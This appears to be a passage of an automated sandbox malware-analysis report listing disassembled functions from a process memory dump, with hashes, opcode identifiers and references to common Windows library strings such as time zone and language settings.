                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FC48 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FC30 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FD8C Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EA1D80 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FD5C Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FED0 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FEA0 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FE24 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FFFC Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00E9FF34 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EC8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • WindowsExcludedProcs, xrefs: 00EC87C1
                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00EC8827
                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00EC8914
                                                                                              • Kernel-MUI-Language-SKU, xrefs: 00EC89FC
                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 00EC87E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcspbrk
                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                              • API String ID: 402402107-258546922
                                                                                              • Opcode ID: 2e8a661b9cde0a713eba9bf35f2243b0b2ad0a2b21f5fa51d40dbc360c869c00
                                                                                              • Instruction ID: 9cd8fe48dbc2153416ee11347aded4a4f35df4ebbd2bd4461283e22b5f2e7b7e
                                                                                              • Opcode Fuzzy Hash: 2e8a661b9cde0a713eba9bf35f2243b0b2ad0a2b21f5fa51d40dbc360c869c00
                                                                                              • Instruction Fuzzy Hash: 4CF1C6B2D00209EFCF51DF95CA81EEEB7F8BB08304F14546AE605B7211EB35AA45DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00F3822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsnlen
                                                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                              • API String ID: 3628947076-1387797911
                                                                                              • Opcode ID: fe563eba0831e46b4a0561e20a1c7d1434d1ecaff5c1b14b34ff6f687d37833a
                                                                                              • Instruction ID: ca631009b6b45aa5356e98202ec01ab98f449edc456c0e06515aeb71248c8402
                                                                                              • Opcode Fuzzy Hash: fe563eba0831e46b4a0561e20a1c7d1434d1ecaff5c1b14b34ff6f687d37833a
                                                                                              • Instruction Fuzzy Hash: 8C417676340709BAEB019A90CC42FEE776C9F05BE4F104111FB04E6191DBBDDB56A7A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00EE13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmpDownload File
